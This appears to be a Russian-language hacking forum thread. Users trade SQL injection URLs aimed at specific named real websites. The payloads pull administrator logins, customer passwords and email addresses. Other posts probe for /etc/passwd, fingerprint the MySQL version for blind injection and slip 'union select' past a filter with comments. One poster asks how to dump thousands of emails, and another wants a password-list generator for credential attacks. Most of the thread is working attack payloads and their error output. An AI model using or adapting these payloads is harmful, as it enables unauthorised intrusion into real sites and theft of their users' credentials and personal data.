Оно просто не отображает или иньекция слепая? Code: http://bikemaster.ru/popup_image1.php?pID=-1'union+select+1,concat(user_name,0x3a,user_password),3,4,5+from+administrators-- или: Code: http://bikemaster.ru/popup_image1.php?pID=-1+union+select+1.2.concat(customers_lastname.0x3a.customers_password.0x3a.customers_email_address).4.5.6.7.8+from+customers--
Иньекция кажется слепая. А вот это что такое: Code: http://www.bikemaster.ru/etc/passwd Раз не пишет, что не найдена страница, значит оно есть Но что ето? Кажется сайт неплохо защитили.
Нет всё там нормально! http://bikemaster.ru/popup_image1.php?pID=-1'+union+select+1,unhex(hex(concat_ws(user_name,0x3a,user_password))),3,4,5+from+0x61646d696e6973747261746f7273/*
Хелп не могу сделать запрос http://www.autoexotica.ru/news/?nid=128' дыра http://www.autoexotica.ru/news/?nid=128+order+by+11/* колонок http://www.autoexotica.ru/news/?nid=128+union+select+1,2,3,4,5,6,7,8,9,10,11/* Пишет ошибку как так? You have an error in your SQL syntax near 'union select 1,2,3,4,5,6,7,8,9,10,11/*' at line 1 SELECT *, DATE_FORMAT(date, "%d.%m.%y") AS frm_date FROM news_data WHERE news_id=128 union select 1,2,3,4,5,6,7,8,9,10,11/*
Дело в том что на сервере стоит 3 версия MySQL которая не поддерживает в подзапросах union http://www.autoexotica.ru/news/?nid=128+AND+ascii(lower(substring(version(),1,1)))=51
2 2la.painkiller та не в запросе просто опечатка должно быть substring(version(),1,1)=3/* почитать можно на ачате вота линк http://forum.antichat.ru/showpost.php?p=565034&postcount=4 пора бы уж хотя бы форуму научиться поиск делать
1064 - You have an error in your SQL syntax near 'union select ... Когда убираешь кавычку перед union, то вообще пустой экран.
есть sql inject, но с лимитом! Есть желание вытащить базу емайлов,но их можно просматривать только по одному, а их > нескольких тысяч,как вытащить?
Ребят, подскажите пли3 универсальный, хороший генератор паролей. Для создания листов user;password самое главное чтобы там была возможность- 1. создание листа, где пароль повторяет имя юзера... ( т.е. берет из файла логины и приписывает, повторяет, логин в пароль... Спасибо
А помоему зря - версия БД начинается, всё равно, с цифр (другого я не видел, по крайней мере если БД - мускул), поэтому что бы узнать первую цифру версии использовать ascii() не обязательно. А вот для вывода не цифровых данных использовать ascii() в общем случае нужно.
Какими запросами крутишь? пишешь так: Code: http://storm.ikit.kg/stats/stats.php?game=D2XP&type=SC&sortBy=rank&sort_direction=1+union+select+1 Он ругается а так: Code: http://storm.ikit.kg/stats/stats.php?game=D2XP&type=SC&sortBy=rank&sort_direction=1+union/**/select+1 уже нет,значит скрипт плюется от union+select...делай выводы ЗЫ:Я сам пока толком не крутил и не понял
